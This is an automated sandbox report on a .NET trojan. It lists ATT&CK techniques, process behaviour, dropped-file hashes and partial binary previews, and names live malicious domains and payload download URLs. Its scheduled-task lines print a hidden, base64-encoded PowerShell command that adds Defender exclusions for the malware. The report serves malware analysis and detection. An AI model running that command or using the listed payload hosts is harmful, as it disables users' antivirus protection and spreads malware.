                    Source: Yara match | File source: 0.2.file.exe.6b60000.12.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 4.2.InstallUtil.exe.4659590.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.TypeId.exe.4c760c8.6.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.file.exe.445c2c8.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.TypeId.exe.4a46068.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.TypeId.exe.4c760c8.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.file.exe.4e7ed90.5.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.TypeId.exe.494cee0.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 4.2.InstallUtil.exe.4659590.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.file.exe.478c788.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 4.2.InstallUtil.exe.4059550.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000004.00000002.3019858995.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000B.00000002.2048354854.0000000003AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000B.00000002.2167920075.0000000007520000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1808267831.0000000008F40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1783529566.0000000006B60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000004.00000002.3204622217.0000000009049000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.1869188121.0000000004131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000004.00000002.3019858995.0000000004659000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1767868411.000000000478C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1830742150.000000000B070000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1767868411.0000000004378000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000004.00000002.3019858995.0000000004058000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1767868411.0000000005266000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1790879005.0000000007CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: file.exe PID: 7600, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: TypeId.exe PID: 7764, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 8028, type: MEMORYSTR
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts131
                    Windows Management Instrumentation
                    11
                    Scheduled Task/Job
                    1
                    Access Token Manipulation
                    1
                    Masquerading
                    OS Credential Dumping321
                    Security Software Discovery
                    Remote Services11
                    Archive Collected Data
                    11
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Command and Scripting Interpreter
                    1
                    DLL Side-Loading
                    211
                    Process Injection
                    1
                    Disable or Modify Tools
                    LSASS Memory1
                    Process Discovery
                    Remote Desktop ProtocolData from Removable Media1
                    Non-Standard Port
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts11
                    Scheduled Task/Job
                    Logon Script (Windows)11
                    Scheduled Task/Job
                    141
                    Virtualization/Sandbox Evasion
                    Security Account Manager141
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin SharesData from Network Shared Drive1
                    Ingress Tool Transfer
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts3
                    PowerShell
                    Login Hook1
                    DLL Side-Loading
                    1
                    Access Token Manipulation
                    NTDS1
                    Application Window Discovery
                    Distributed Component Object ModelInput Capture2
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script211
                    Process Injection
                    LSA Secrets123
                    System Information Discovery
                    SSHKeylogging3
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                    Deobfuscate/Decode Files or Information
                    Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                    Obfuscated Files or Information
                    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                    Software Packing
                    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    DLL Side-Loading
                    /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    Behavior Graph ID: 1458397 | Sample: file.exe | Startdate: 17/06/2024 | Architecture: WINDOWS | Score: 100
                    Start node
                      DNS/IP: f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm; 1.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm
                      Signatures: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 11 other signatures
                      Started processes: TypeId.exe; file.exe; powershell.exe; 2 other processes
                    TypeId.exe
                      Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines); 2 other signatures
                      Started process: InstallUtil.exe
                    file.exe
                      DNS/IP: f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm 188.114.96.3, 443, 49731, 49732 CLOUDFLARENETUS European Union
                      Dropped files: C:\Users\user\AppData\Local\...\TypeId.exe, PE32; C:\Users\user\...\TypeId.exe:Zone.Identifier, ASCII; C:\Users\user\AppData\Local\...\file.exe.log, ASCII
                      Signature: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    powershell.exe
                      Signature: Loading BitLocker PowerShell Module
                      Started process: conhost.exe
                    2 other processes
                      Started process: conhost.exe
                    InstallUtil.exe
                      DNS/IP: 1.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm 77.221.140.76, 49735, 58001, 65276 INFOBOX-ASInfoboxruAutonomousSystemRU Russian Federation
                      Dropped file: C:\Users\user\AppData\Local\...\txxbiwtbs.exe, PE32
                      Signature: Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

                    Source | Detection | Scanner | Label | Link
                    file.exe | 13% | ReversingLabs | Win32.Trojan.Barys |
                    file.exe | 39% | Virustotal | | Browse
                    file.exe | 100% | Joe Sandbox ML | |
                    Source | Detection | Scanner | Label | Link
                    C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe | 100% | Joe Sandbox ML | |
                    C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe | 100% | Joe Sandbox ML | |
                    C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe | 13% | ReversingLabs | Win32.Trojan.Barys |
                    No Antivirus matches
                    No Antivirus matches
                    Source | Detection | Scanner | Label | Link
                    http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
                    http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
                    http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe |
                    http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation | safe |
                    https://contoso.com/License | 0% | URL Reputation | safe |
                    https://contoso.com/Icon | 0% | URL Reputation | safe |
                    https://contoso.com/ | 0% | URL Reputation | safe |
                    https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
                    https://aka.ms/pscore68 | 0% | URL Reputation | safe |
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
                    https://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm/don2-m/Dllzeadr.pdf | 0% | Avira URL Cloud | safe |
                    https://stackoverflow.com/q/14436606/23354 | 0% | Avira URL Cloud | safe |
                    http://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm | 0% | Avira URL Cloud | safe |
                    https://github.com/mgravell/protobuf-net | 0% | Avira URL Cloud | safe |
                    https://ion=v4.5T | 0% | Avira URL Cloud | safe |
                    https://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm/don2/Qlxywcbxa.mp4 | 0% | Avira URL Cloud | safe |
                    https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe |
                    http://www.microsoft. | 0% | Avira URL Cloud | safe |
                    https://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm/don2-m/kr/Wudbi | 0% | Avira URL Cloud | safe |
                    http://schemas.microso | 0% | Avira URL Cloud | safe |
                    http://crl.m | 0% | Avira URL Cloud | safe |
                    https://stackoverflow.com/q/11564914/23354; | 0% | Avira URL Cloud | safe |
                    https://github.com/mgravell/protobuf-neti | 0% | Avira URL Cloud | safe |
                    http://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm8 | 0% | Avira URL Cloud | safe |
                    http://schemas.xmlsoap.org/wsdl/ | 0% | Avira URL Cloud | safe |
                    https://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i. | 0% | Avira URL Cloud | safe |
                    https://stackoverflow.com/q/2152978/23354 | 0% | Avira URL Cloud | safe |
                    https://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm/don2-m/kr/Wudbiu.exe | 0% | Avira URL Cloud | safe |
                    https://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm | 0% | Avira URL Cloud | safe |
                    http://schemas.microsoft | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm | 188.114.96.3 | true | true | | unknown
1.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm | 77.221.140.76 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm/don2-m/Dllzeadr.pdf | true | Avira URL Cloud: safe | unknown
https://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm/don2/Qlxywcbxa.mp4 | true | Avira URL Cloud: safe | unknown
https://f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm/don2-m/kr/Wudbiu.exe | true | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
188.114.96.3 | f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm | European Union | 13335 | CLOUDFLARENETUS | true
77.221.140.76 | 1.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm | Russian Federation | 30968 | INFOBOX-ASInfoboxruAutonomousSystemRU | false
                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1458397
                          Start date and time:2024-06-17 16:17:45 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 10m 34s
                          Hypervisor based Inspection enabled:false
                          Report type:light
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:13
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:file.exe
                          Detection:MAL
                          Classification:mal100.troj.evad.winEXE@9/15@2/2
                          EGA Information:
                          • Successful, ratio: 60%
                          HCA Information:
                          • Successful, ratio: 87%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                          • TCP Packets have been reduced to 100
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target TypeId.exe, PID 7764 because it is empty
                          • Execution Graph export aborted for target powershell.exe, PID 7748 because it is empty
• Not all processes were analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                          • Report size getting too big, too many NtCreateKey calls found.
                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
10:18:40 | API Interceptor | 20x Sleep call for process: file.exe modified
10:18:45 | API Interceptor | 19x Sleep call for process: TypeId.exe modified
10:18:48 | API Interceptor | 60x Sleep call for process: powershell.exe modified
10:18:52 | API Interceptor | 1639331x Sleep call for process: InstallUtil.exe modified
10:19:02 | API Interceptor | 21x Sleep call for process: txxbiwtbs.exe modified
15:18:45 | Task Scheduler | Run new task: lfuhpl path: powershell.exe s>-ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA==
15:18:45 | Task Scheduler | Run new task: TypeId path: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe
15:18:53 | Task Scheduler | Run new task: qugwjz path: powershell.exe s>-ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA==
15:19:02 | Task Scheduler | Run new task: txxbiwtbs path: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe
No context
                          Process:C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1242
                          Entropy (8bit):5.363036002058323
                          Encrypted:false
                          SSDEEP:24:ML9E4KlKDE4KhKiKhwE4Ty1KIE4oKNzKoZAE4KzeRE4Kx1qE4j:MxHKlYHKh3owH8tHo6hAHKzeRHKx1qHj
                          MD5:F1F711CFAECF73CB41019220224BA3D7
                          SHA1:3FBBB184F8CB609B0854E6966021CF94CD684C8A
                          SHA-256:B8374EA1B272A4A1D9B698BB7E4589191563DE7AEB03AB4B1BD56A09A5F5C5B1
                          SHA-512:CE6358F1D7E440C0873DFD65C9DC14804749CA41DB3582A59314C01FF10CD6A037A720777D6C14EC454EED400B2DB52CFBFC3F1954C16BFF207F76E9A4847ADF
                          Malicious:false
                          Reputation:moderate, very likely benign file
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\bb5812ab3cec92427da8c5c696e5f731\System.Net.Http.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.X
                          Process:C:\Users\user\Desktop\file.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1242
                          Entropy (8bit):5.363036002058323
                          Encrypted:false
                          SSDEEP:24:ML9E4KlKDE4KhKiKhwE4Ty1KIE4oKNzKoZAE4KzeRE4Kx1qE4j:MxHKlYHKh3owH8tHo6hAHKzeRHKx1qHj
                          MD5:F1F711CFAECF73CB41019220224BA3D7
                          SHA1:3FBBB184F8CB609B0854E6966021CF94CD684C8A
                          SHA-256:B8374EA1B272A4A1D9B698BB7E4589191563DE7AEB03AB4B1BD56A09A5F5C5B1
                          SHA-512:CE6358F1D7E440C0873DFD65C9DC14804749CA41DB3582A59314C01FF10CD6A037A720777D6C14EC454EED400B2DB52CFBFC3F1954C16BFF207F76E9A4847ADF
                          Malicious:true
                          Reputation:moderate, very likely benign file
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\bb5812ab3cec92427da8c5c696e5f731\System.Net.Http.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.X
                          Process:C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1242
                          Entropy (8bit):5.363036002058323
                          Encrypted:false
                          SSDEEP:24:ML9E4KlKDE4KhKiKhwE4Ty1KIE4oKNzKoZAE4KzeRE4Kx1qE4j:MxHKlYHKh3owH8tHo6hAHKzeRHKx1qHj
                          MD5:F1F711CFAECF73CB41019220224BA3D7
                          SHA1:3FBBB184F8CB609B0854E6966021CF94CD684C8A
                          SHA-256:B8374EA1B272A4A1D9B698BB7E4589191563DE7AEB03AB4B1BD56A09A5F5C5B1
                          SHA-512:CE6358F1D7E440C0873DFD65C9DC14804749CA41DB3582A59314C01FF10CD6A037A720777D6C14EC454EED400B2DB52CFBFC3F1954C16BFF207F76E9A4847ADF
                          Malicious:false
                          Reputation:moderate, very likely benign file
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\bb5812ab3cec92427da8c5c696e5f731\System.Net.Http.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.X
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):64
                          Entropy (8bit):1.1510207563435464
                          Encrypted:false
                          SSDEEP:3:NlllulTkklh:NllUokl
                          MD5:8F489B5B8555D6E9737E8EE991AA32FD
                          SHA1:05B412B1818DDB95025A6580D9E1F3845F6A2AFC
                          SHA-256:679D924F42E8FC107A7BE221DE26CCFEBF98633EA2454D3B4E0D82ED66E3E03D
                          SHA-512:97521122A5B64237EF3057A563284AC5C0D3354E8AC5AA0DE2E2FA61BA63379091200D1C4A36FABC16B049E83EF11DBB62E1987A6E4D6A4BCD5DDB27E7BD9F49
                          Malicious:false
                          Preview:@...e................................................@..........
                          Process:C:\Users\user\Desktop\file.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):7168
                          Entropy (8bit):4.603088616512972
                          Encrypted:false
                          SSDEEP:96:UbeKbfVuzznTurnqqXz18S355vr0xvBRl4gLab/N6aigzQ7MzNt:UHwznTurnqqXx8A5ofto/caigzk2
                          MD5:AF4A6267CE7F24818FEEB7D2D62E72C2
                          SHA1:DD780F62E9539C39244526E26E518663B53FB20E
                          SHA-256:43261F85DB3AB88ED6E6B00B4227C5E8E90DDBCABB491109196A0643AEB3D313
                          SHA-512:0A5BF9C2EBA71A6F313DAE9C288C4E616A3661CFCFAB00D30784719807006B734BD187E4C6050DDA49736A11B003AA62F21BFAC1958155B6308929C99ED4C23B
                          Malicious:true
                          Antivirus:
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 13%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....cpf.............................0... ...@....@.. ....................................`.................................t0..J....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................0......H........$..d............................................................0...........:......+s.,.8q...r...p8q...8v...8{...8|...8....8....8....s.......+%...o......(.........%-.2....o......X...,..,..o....2.....P.8....s....8....(....8....o....8.....8....(....8z....8y...o....8t....8s...&.3.....*.................0...........,9.8.....-.+.+.+..-.&.$(....+.o....+.(....+..+.o....(......8.....8....9r....9l....8}....,..,.+.o........+.o....(.......,D...%-).+'...........r...p .......o....
                          Process:C:\Users\user\Desktop\file.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:true
                          Preview:[ZoneTransfer]....ZoneId=0
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):7168
                          Entropy (8bit):4.594339552116368
                          Encrypted:false
                          SSDEEP:96:hVoYfVBznTurnqqXi+RpKr5rUvr0JBRl4gFJNuaDXc6zNt:hv/znTurnqqX3w1oo7fJYaDs8
                          MD5:E8CE921868FE7C47FD2C236555EE5BFD
                          SHA1:BE76C59C6F1256B3A64562616A87F6F4B8B27DD1
                          SHA-256:64244E9D53EA984B731F67B6518BF4A0F030B8B76981AB5D2D36F1C5D4FAB955
                          SHA-512:41E2CB1F4C2B20D029FBBDCE4886603F8EF3CE0CA9ED763BE45801CB0085E5C44C0EA8ED36A1207E0A21977681C6865991D321734BDBF977EA48707C1FFA309D
                          Malicious:true
                          Antivirus:
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?gpf.............................0... ...@....@.. ....................................`.................................|0..J....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................0......H........$..l...........................................................*+.*(....+...0...........,9.8.....-.+.+.+..-.&.$(....+.o....+.(....+..+.o....(......8.....8....9r....9l....8}....,..,.+.o........+.o....(.......,D...%-).+'...........r...p .......o....&..&....X....i2...o....(......*.8D....8v...(....8r....8}.....4......'0........X..k....................z.8........0...........:......+s.,.8q...r#..p8q...8v...8{...8|...8....8....8....s.......+%...o......(.........%-.2....o...
                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Entropy (8bit):4.603088616512972
                          TrID:
                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                          • Win32 Executable (generic) a (10002005/4) 49.78%
                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                          • Generic Win/DOS Executable (2004/3) 0.01%
                          • DOS Executable Generic (2002/1) 0.01%
                          File name:file.exe
                          File size:7'168 bytes
                          MD5:af4a6267ce7f24818feeb7d2d62e72c2
                          SHA1:dd780f62e9539c39244526e26e518663b53fb20e
